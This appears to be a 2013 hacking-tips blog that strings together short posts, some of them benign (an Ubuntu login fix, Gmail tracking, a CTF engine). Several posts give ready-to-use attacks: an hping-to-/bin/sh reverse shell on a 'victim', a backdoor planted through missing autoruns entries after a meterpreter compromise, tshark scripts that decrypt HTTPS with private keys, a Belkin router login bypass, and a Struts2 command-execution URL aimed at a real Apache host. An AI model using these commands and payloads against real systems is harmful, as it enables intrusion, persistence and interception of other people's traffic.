Oct 19, 2013

Howto: Fix for Can’t login after upgrading from ubuntu 13.04 to ubuntu 13.10

apt-get purge cinnamon*
sudo apt-get autoremove

Source:  http://www.ubuntugeek.com/fix-for-cant-login-after-upgrading-from-ubuntu-13-04-to-ubuntu-13-10.html


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Oct 18, 2013

Howto: Create a reverse shell by reusing an open port

Lets assume you want to create a reverse shell from box A to box B. Box B is your host behind NAT and box A is your victim host.

Download and install hping:
On A run the following command:
hping -I eth0 -p 22 --listen PATTERN | /bin/sh
 
The above command puts hping in a listen/sniff mode on eth0 interface and port 22 that is an open and publicly routable port. It listens to specific PATTERN in the incoming data. This is important to distinguish between the data that you are interested to capture and other data that come to port 22. PATTERN is a signature payload that hping looks for inside that TCP data payload. You can use any keyword here like 'mySecret', '[root@victim root]'. On B run the following command:
echo "PATTERN;" | ncat -v BOXA-IP 22
 
Source: http://www.pedramhayati.com/2013/05/11/create-stealy-reverse-shell-using-already-openned-port/ 



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Sniffing HTTP/HTTPS Traffic with tshark

tshark 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' -R 'http.request.method == "GET" || http.request.method == "POST"'

tshark -r private_bob.pcap -o ssl.keys_list:"192.168.3.206","443","http","e:\education\ssl\wireshark_ssl\private-key.pem" -o ssl.debug_file:"e:\temp\ssl-debug.log" -V -R http


#### Tshark.sh for https
#!/bin/bash
 

tshark -o "ssl.desegment_ssl_records: TRUE" -o "ssl.desegment_ssl_application_data: TRUE" -o "ssl.keys_list: 127.0.0.1,443,http,/test/mycert.key" -o "ssl.debug_file: /var/log/https-post.log" -i eth1 -T fields -E separator="|" -t e -R "tcp.port == 443 and http.request" -e frame.time -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport  -e http.request.method -e http.request.full_uri -e data -e text >> /var/log/https.log &


#### Tshark.sh for http
#!/bin/bash

tshark -i eth1 -T fields -E separator="|" -t e -R "tcp.port == 80 and http.request" -e frame.time -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport  -e http.request.method -e http.request.full_uri -e data -e text >> /var/log/http.log &
 




Source: 
http://kvz.io/blog/2010/05/15/analyze-http-requests-with-tshark/
http://www.wireshark.org/docs/man-pages/tshark.html
http://ask.wireshark.org/questions/4766/how-to-decrypt-ssl-traffic-with-tshark-16

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: List Of Sniffing Tools

  • arpspoof - Send out unrequested (and possibly forged) arp replies.
  • dnsspoof - forge replies to arbitrary DNS address / pointer queries on the Local Area Network.
  • dsniff - password sniffer for several protocols.
  • filesnarf - saves selected files sniffed from NFS traffic.
  • macof - flood the local network with random MAC addresses.
  • mailsnarf - sniffs mail on the LAN and stores it in mbox format.
  • msgsnarf - record selected messages from different Instant Messengers.
  • sshmitm - SSH monkey-in-the-middle. proxies and sniffs SSH traffic.
  • sshow - SSH traffic analyser.
  • tcpkill - kills specified in-progress TCP connections.
  • tcpnice - slow down specified TCP connections via "active" traffic shaping.
  • urlsnarf - output selected URLs sniffed from HTTP traffic in CLF.
  • webmitm - HTTP / HTTPS monkey-in-the-middle. transparently proxies.
  • webspy - sends URLs sniffed from a client to your local browser (requires libx11-6 installed). Please do not abuse this software
  • Justniffer - HTTP and TCP connection sniffer.




If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Oct 15, 2013

Tools: Web-Sorrow = Scanner Tool

Web-Sorrow is a perl based tool for misconfiguration, version detection, enumeration, and server information scanning. It's entirely focused on Enumeration and collecting Info on the target server. Web-Sorrow is a "safe to run" program, meaning it is not designed to be an exploit or perform any harmful attacks.  

Source: https://code.google.com/p/web-sorrow/


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Create Backdoor Using missing autoruns

1. Compromise the victim

2. Get meterpreter shell.
3. Upload sysinternal`s autoruns.exe & autorun.exe to victim machine.

4. Now from uploaded directory execute following command to get missing autoruns of machine

$ autorunsc.exe -a | findstr /n /R "File\ not\ found"
5. Now we have list of file which is missing ; these files are run at startup time.


6. Rename backdoor to the name of file that missing & uploaded to the path where it`s not found.

7. Now whenever machine is restarted you get shell

Source: http://tipstrickshack.blogspot.com/2013/10/create-backdoor-using-missing-autoruns.html


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Track Gmail Messages with Google Analytics

Here’s how you can add Analytics tracking to your Gmail messages:
  1. Go to your Gmail and compose a new email message. You can also include attachments and inline images in your message. Once the message is ready, let it stay in your Drafts folder and do not hit the Send button.
  2. Open this Google sheet and choose the Initialize option under the Email Tracker menu. This is a one-time requirement as you’ll have to authorize the sheet to send your Gmail messages with the tracking image included.
  3. Once the script is authorized, choose Email Tracker -> Send Mail, select your Gmail draft from the drop-down, enter your Google Analytics Profile ID* and hit the Send button. Your mail will be delivered to the recipient.
Source: http://www.labnol.org/internet/email/track-gmail-with-google-analytics/8082/




If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Mellivora = CTF Engine

Mellivora is a basic database driven CTF engine written in PHP

Source: https://github.com/Nakiami/mellivora


 
If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Oct 14, 2013

Tools: Portspoof

The general goal of the program is to make the port scanning software (Nmap/Unicornscan/etc) process slow and output very difficult to interpret, thus making the attack reconnaissance phase a challenging and bothersome task

Source: http://linuxaria.com/article/portspoof-an-interesting-anti-snooping-tool-for-linux?lang=en


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Belkin Authentication Bypass

When you first visit a belkin router you're presented with a basic info page doesn't look too fancy but if you do try to get to the juicy stuff you're confronted with a login page. Unfortunately the md5 hashed password is stored IN A JAVASCRIPT VARIABLE on the page so bypassing is as simple as either reversing the hash or (and this is great) simply passing it via the POST request.
Example: Share N300 Wireless N+ Router http://i.imgur.com/qTn6kF5.png
I've noted this works on just about every belkin router with a similar frontend to this. An example of that is the F5D8236 model..a demo of which can be found @ http://www.belkin.com/Pyramid/AdvancedInfo/F5D8236-4ver2111/Interfaces/F5D8236-4v2111/login.stm

Source: http://www.reddit.com/r/netsec/comments/1obilw/belkin_authentication_bypass/



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Apache Software Foundation A Subsite Remote command execution

Apache struts2 a vulnerability introduced by manipulating parameters prefixed with "action:"/"redirect:"/"redirectAction:" allows remote command execution

# Show web root
http://vmbuild.apache.org/continuum/groupSummary.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matr%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23matt.getWriter().println(%23matr.getRealPath(%22/%22)),%23matt.getWriter().flush(),%23matt.getWriter().close()}


Source: http://en.wooyun.org/bugs/wooyun-2013-06?1065&1805



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |